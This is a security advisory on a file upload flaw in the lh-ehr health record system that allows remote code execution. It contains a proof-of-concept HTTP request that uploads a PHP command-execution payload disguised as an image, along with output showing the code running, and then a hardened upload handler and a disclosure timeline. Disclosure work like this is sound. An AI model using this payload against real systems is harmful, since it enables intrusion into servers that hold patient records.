0dd - The Zero (0) Day Division

The Zero (0) Day Division is a group of security professionals working towards a common goal: securing open-source projects.

LH-EHR RCE Via Picture Upload

The Issue

This is an arbitrary file upload vulnerability: any user who can set profile pictures can execute code on the hosting system. In lh-ehr, an attacker must be authenticated and have sufficient privileges to upload a profile picture (for either a user or a patient) to perform this attack. It appears that any valid user has these privileges.

Issue location

Occurs at https://github.com/LibreHealthIO/lh-ehr/blob/5b5f427c4742f901e426f17325fb0aaf8209e0bb/interface/patient_file/summary/demographics.php#L1735

POC:

POST /lh-ehr/interface/patient_file/summary/demographics.php?set_pid=153391 HTTP/1.1
Host: 192.168.9.142
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.9.142/lh-ehr/interface/patient_file/summary/demographics.php?set_pid=153391
Content-Type: multipart/form-data; boundary=---------------------------216243089528218
Content-Length: 252
Cookie: LibreHealthEHR=e2hroqj4n8d8odrds55bes4ui2
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------216243089528218
Content-Disposition: form-data; name="profile_picture"; filename="T03KD3TL5-U44DPA2RY-73f7cefa04dd-1000.php"
Content-Type: image/png

<?php echo `id`; ?>
-----------------------------216243089528218--

Requesting the stored file shows that the web server executes it:

ubuntu@ubuntu:/var/www/html/lh-ehr/profile_pictures$ curl 127.0.0.1/lh-ehr/profile_pictures/153391.php
uid=33(www-data) gid=33(www-data) groups=33(www-data)
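The root cause shown above is that the stored file keeps whatever extension the client supplied, so a .php upload lands in a web-served directory and runs. The following is an added example of a hardened profile-picture handler, written for this post and not taken from lh-ehr; the function name, parameter names and error messages are assumptions, and it derives the stored extension from the decoded image rather than from the filename or Content-Type header.

```php
<?php
// Added example (not lh-ehr's own code): store a profile picture without
// trusting anything the client says about the file. Names ($file, $pid, $dir)
// and the exception messages are assumptions for illustration.

declare(strict_types=1);

const MAX_PICTURE_BYTES = 2 * 1024 * 1024;

// Only these decoded image types are accepted, each mapped to a fixed extension.
const ALLOWED_IMAGE_TYPES = [
    IMAGETYPE_PNG  => 'png',
    IMAGETYPE_JPEG => 'jpg',
    IMAGETYPE_GIF  => 'gif',
];

/**
 * Validate one $_FILES entry and store it as <pid>.<ext> inside $dir.
 * Returns the stored path, or throws on any validation failure.
 * $dir should still be served with script execution disabled (or kept
 * outside the web root), so a valid image is never executed as code.
 */
function store_profile_picture(array $file, int $pid, string $dir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if (($file['size'] ?? 0) > MAX_PICTURE_BYTES) {
        throw new RuntimeException('file too large');
    }
    // Refuse anything that did not arrive through PHP's form-upload path.
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    // Decode the image header; a PHP script with Content-Type: image/png fails here.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || !isset(ALLOWED_IMAGE_TYPES[$info[2]])) {
        throw new RuntimeException('not an accepted image type');
    }
    // The extension comes from the decoded type, never from $file['name'].
    $target = rtrim($dir, '/') . '/' . $pid . '.' . ALLOWED_IMAGE_TYPES[$info[2]];
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        throw new RuntimeException('could not store picture');
    }
    return $target;
}
```

With this check in place, the request in the POC is rejected at the getimagesize() step, and even a genuine image is stored under a fixed image extension rather than one chosen by the uploader.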

Disclosure Timeline

  • Issue Reported: 11th August 2018
  • Issue Resolved: <TBD>
  • Blog Post Published: 3rd September 2018